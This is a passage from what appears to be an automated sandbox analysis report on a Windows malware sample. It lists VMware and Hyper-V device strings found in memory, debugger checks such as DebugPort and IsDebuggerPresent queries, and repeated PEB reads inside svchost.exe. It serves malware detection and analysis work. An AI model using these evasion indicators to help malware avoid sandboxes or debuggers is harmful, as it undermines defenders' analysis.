          Source: explorer.exe, 0000000E.00000002.2920536485.00000000078E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \Device\HarddiskVolume1\??\Volume{ad6cc5d8-f1a9-4873-be33-91b2f05e9306}\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:M
          Source: explorer.exe, 0000000E.00000002.2919550460.0000000004CFB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWa
          Source: explorer.exe, 0000000E.00000003.2809741840.000000000C93C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 0000000E.00000003.2809741840.000000000C93C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000a@v
          Source: explorer.exe, 0000000E.00000003.2839857890.000000000C93C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_
          Source: explorer.exe, 0000000E.00000002.3020099476.000000000C914000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 0000000E.00000003.2818462375.000000000C9FD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}\
          Source: explorer.exe, 00000002.00000002.2694034395.00000000078AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTTAVMWare
          Source: explorer.exe, 00000002.00000002.2695744148.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
          Source: explorer.exe, 0000000E.00000002.2915536056.00000000010B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000!#
          Source: explorer.exe, 0000000E.00000003.2825363146.000000000C9FD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}\E$
          Source: explorer.exe, 0000000E.00000002.2920536485.00000000079D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000S=:x
          Source: explorer.exe, 0000000E.00000003.2816895815.000000000CA63000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000E.00000003.2818462375.000000000C9FD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}9%
          Source: explorer.exe, 00000002.00000000.1660518211.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2694034395.0000000007A34000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnx
          Source: explorer.exe, 0000000E.00000003.2816895815.000000000CA72000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000002.2695744148.0000000009660000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
          Source: explorer.exe, 0000000E.00000003.2809741840.000000000C93C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000&
          Source: explorer.exe, 0000000E.00000003.2839857890.000000000C93C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D: ]
          Source: explorer.exe, 0000000E.00000002.2920536485.00000000079D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NXTYSTEVMWare
          Source: explorer.exe, 0000000E.00000002.2976289585.0000000008BFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000E.00000003.2842304011.000000000C9FD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000002.2696706638.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 0000000E.00000003.2818462375.000000000C9FD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}\d%
          Source: explorer.exe, 0000000E.00000003.2839857890.000000000C9A9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NECVMWarVMware SATA CD001.00
          Source: explorer.exe, 00000002.00000002.2686435138.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
          Source: explorer.exe, 0000000E.00000003.2842463004.000000000C85B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}eid
          Source: explorer.exe, 0000000E.00000003.2818462375.000000000C9FD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}8$
          Source: explorer.exe, 0000000E.00000002.3020099476.000000000C93C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000'[
          Source: explorer.exe, 0000000E.00000003.2842304011.000000000C9FD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}\
          Source: explorer.exe, 0000000E.00000003.2817380895.000000000C93C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_0
          Source: explorer.exe, 0000000E.00000003.2842304011.000000000C9FD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}
          Source: explorer.exe, 00000002.00000000.1660518211.00000000078A0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
          Source: explorer.exe, 00000002.00000002.2695744148.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00\w
          Source: explorer.exe, 00000002.00000002.2696706638.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 0000000E.00000003.2756647360.0000000008A9F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v@oem2.inf,%loc.vmwarebusdevicedesc%;VMware VMCI Bus Device
          Source: explorer.exe, 0000000E.00000003.2842304011.000000000C9FD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}e\
          Source: explorer.exe, 0000000E.00000003.2809741840.000000000C93C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&0000008@v
          Source: explorer.exe, 0000000E.00000003.2842304011.000000000C9FD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000E.00000002.2915536056.00000000010B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-92600
          Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-92961
          Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\explorer.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\explorer.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F7096E rdtsc 1_2_02F7096E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72AD0 NtReadFile,LdrInitializeThunk,1_2_02F72AD0
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F16AAF BlockInput,0_2_00F16AAF
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EC3D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00EC3D19
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EF3920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,0_2_00EF3920
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EDE01E LoadLibraryA,GetProcAddress,0_2_00EDE01E
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0116D6A0 mov eax, dword ptr fs:[00000030h]0_2_0116D6A0
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0116ED40 mov eax, dword ptr fs:[00000030h]0_2_0116ED40
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0116ECE0 mov eax, dword ptr fs:[00000030h]0_2_0116ECE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F402E1 mov eax, dword ptr fs:[00000030h]1_2_02F402E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F402E1 mov eax, dword ptr fs:[00000030h]1_2_02F402E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F402E1 mov eax, dword ptr fs:[00000030h]1_2_02F402E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]1_2_02F3A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]1_2_02F3A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]1_2_02F3A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]1_2_02F3A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]1_2_02F3A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F402A0 mov eax, dword ptr fs:[00000030h]1_2_02F402A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F402A0 mov eax, dword ptr fs:[00000030h]1_2_02F402A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC62A0 mov eax, dword ptr fs:[00000030h]1_2_02FC62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC62A0 mov ecx, dword ptr fs:[00000030h]1_2_02FC62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC62A0 mov eax, dword ptr fs:[00000030h]1_2_02FC62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC62A0 mov eax, dword ptr fs:[00000030h]1_2_02FC62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC62A0 mov eax, dword ptr fs:[00000030h]1_2_02FC62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC62A0 mov eax, dword ptr fs:[00000030h]1_2_02FC62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E284 mov eax, dword ptr fs:[00000030h]1_2_02F6E284
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E284 mov eax, dword ptr fs:[00000030h]1_2_02F6E284
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB0283 mov eax, dword ptr fs:[00000030h]1_2_02FB0283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB0283 mov eax, dword ptr fs:[00000030h]1_2_02FB0283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB0283 mov eax, dword ptr fs:[00000030h]1_2_02FB0283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F34260 mov eax, dword ptr fs:[00000030h]1_2_02F34260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F34260 mov eax, dword ptr fs:[00000030h]1_2_02F34260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F34260 mov eax, dword ptr fs:[00000030h]1_2_02F34260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2826B mov eax, dword ptr fs:[00000030h]1_2_02F2826B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2A250 mov eax, dword ptr fs:[00000030h]1_2_02F2A250
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36259 mov eax, dword ptr fs:[00000030h]1_2_02F36259
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB8243 mov eax, dword ptr fs:[00000030h]1_2_02FB8243
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB8243 mov ecx, dword ptr fs:[00000030h]1_2_02FB8243
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2823B mov eax, dword ptr fs:[00000030h]1_2_02F2823B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4E3F0 mov eax, dword ptr fs:[00000030h]1_2_02F4E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4E3F0 mov eax, dword ptr fs:[00000030h]1_2_02F4E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4E3F0 mov eax, dword ptr fs:[00000030h]1_2_02F4E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F663FF mov eax, dword ptr fs:[00000030h]1_2_02F663FF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F403E9 mov eax, dword ptr fs:[00000030h]1_2_02F403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F403E9 mov eax, dword ptr fs:[00000030h]1_2_02F403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F403E9 mov eax, dword ptr fs:[00000030h]1_2_02F403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F403E9 mov eax, dword ptr fs:[00000030h]1_2_02F403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F403E9 mov eax, dword ptr fs:[00000030h]1_2_02F403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F403E9 mov eax, dword ptr fs:[00000030h]1_2_02F403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F403E9 mov eax, dword ptr fs:[00000030h]1_2_02F403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F403E9 mov eax, dword ptr fs:[00000030h]1_2_02F403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDE3DB mov eax, dword ptr fs:[00000030h]1_2_02FDE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDE3DB mov eax, dword ptr fs:[00000030h]1_2_02FDE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDE3DB mov ecx, dword ptr fs:[00000030h]1_2_02FDE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDE3DB mov eax, dword ptr fs:[00000030h]1_2_02FDE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD43D4 mov eax, dword ptr fs:[00000030h]1_2_02FD43D4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD43D4 mov eax, dword ptr fs:[00000030h]1_2_02FD43D4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FEC3CD mov eax, dword ptr fs:[00000030h]1_2_02FEC3CD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]1_2_02F3A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]1_2_02F3A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]1_2_02F3A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]1_2_02F3A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]1_2_02F3A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]1_2_02F3A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F383C0 mov eax, dword ptr fs:[00000030h]1_2_02F383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F383C0 mov eax, dword ptr fs:[00000030h]1_2_02F383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F383C0 mov eax, dword ptr fs:[00000030h]1_2_02F383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F383C0 mov eax, dword ptr fs:[00000030h]1_2_02F383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB63C0 mov eax, dword ptr fs:[00000030h]1_2_02FB63C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F28397 mov eax, dword ptr fs:[00000030h]1_2_02F28397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F28397 mov eax, dword ptr fs:[00000030h]1_2_02F28397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F28397 mov eax, dword ptr fs:[00000030h]1_2_02F28397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2E388 mov eax, dword ptr fs:[00000030h]1_2_02F2E388
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2E388 mov eax, dword ptr fs:[00000030h]1_2_02F2E388
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2E388 mov eax, dword ptr fs:[00000030h]1_2_02F2E388
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5438F mov eax, dword ptr fs:[00000030h]1_2_02F5438F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5438F mov eax, dword ptr fs:[00000030h]1_2_02F5438F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD437C mov eax, dword ptr fs:[00000030h]1_2_02FD437C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB035C mov eax, dword ptr fs:[00000030h]1_2_02FB035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB035C mov eax, dword ptr fs:[00000030h]1_2_02FB035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB035C mov eax, dword ptr fs:[00000030h]1_2_02FB035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB035C mov ecx, dword ptr fs:[00000030h]1_2_02FB035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB035C mov eax, dword ptr fs:[00000030h]1_2_02FB035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB035C mov eax, dword ptr fs:[00000030h]1_2_02FB035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFA352 mov eax, dword ptr fs:[00000030h]1_2_02FFA352
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD8350 mov ecx, dword ptr fs:[00000030h]1_2_02FD8350
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2C310 mov ecx, dword ptr fs:[00000030h]1_2_02F2C310
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F50310 mov ecx, dword ptr fs:[00000030h]1_2_02F50310
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6A30B mov eax, dword ptr fs:[00000030h]1_2_02F6A30B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6A30B mov eax, dword ptr fs:[00000030h]1_2_02F6A30B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6A30B mov eax, dword ptr fs:[00000030h]1_2_02F6A30B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2C0F0 mov eax, dword ptr fs:[00000030h]1_2_02F2C0F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F720F0 mov ecx, dword ptr fs:[00000030h]1_2_02F720F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2A0E3 mov ecx, dword ptr fs:[00000030h]1_2_02F2A0E3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F380E9 mov eax, dword ptr fs:[00000030h]1_2_02F380E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB60E0 mov eax, dword ptr fs:[00000030h]1_2_02FB60E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB20DE mov eax, dword ptr fs:[00000030h]1_2_02FB20DE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF60B8 mov eax, dword ptr fs:[00000030h]1_2_02FF60B8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF60B8 mov ecx, dword ptr fs:[00000030h]1_2_02FF60B8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC80A8 mov eax, dword ptr fs:[00000030h]1_2_02FC80A8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3208A mov eax, dword ptr fs:[00000030h]1_2_02F3208A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5C073 mov eax, dword ptr fs:[00000030h]1_2_02F5C073
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F32050 mov eax, dword ptr fs:[00000030h]1_2_02F32050
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB6050 mov eax, dword ptr fs:[00000030h]1_2_02FB6050
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC6030 mov eax, dword ptr fs:[00000030h]1_2_02FC6030
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2A020 mov eax, dword ptr fs:[00000030h]1_2_02F2A020
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2C020 mov eax, dword ptr fs:[00000030h]1_2_02F2C020
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4E016 mov eax, dword ptr fs:[00000030h]1_2_02F4E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4E016 mov eax, dword ptr fs:[00000030h]1_2_02F4E016
